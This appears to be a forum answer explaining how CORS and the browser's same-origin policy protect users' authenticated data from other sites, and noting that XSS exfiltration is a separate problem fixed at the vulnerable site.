As I learned from this post, when page from
www.a.com
makes AJAX request towww.b.com
, then it’s thewww.b.com
that decides if request should be allowed or not.
Not quite. The request isn’t blocked (at least, if it is simple).
By default the JavaScript running on www.a.com
is forbidden access to the response from www.b.com
.
CORS allows www.b.com
to give permission to the JavaScript on www.a.com
to access the response.
But what is exactly secured on client in such model?
It stops the author of www.a.com
from reading data from www.b.com
using the browser of a User who has visited both sites and has been authenticated on www.b.com
(and thus has access to data that isn’t public).
For example, Alice is logged into Google. Alice visits malicious.example
which uses XMLHttpRequest to access data from gmail.com
. Alice has a GMail account so the response has a list of the most recent email in her inbox. The same origin policy prevents malicious.example
from reading it.
For example, hacker success to make XSS script injection to my page, then it makes AJAX request to his domain to store user data. So hackers domain will allow such request for sure.
Correct. XSS is a different security problem that needs to be addressed at source (i.e. at www.a.com
and not in the browser).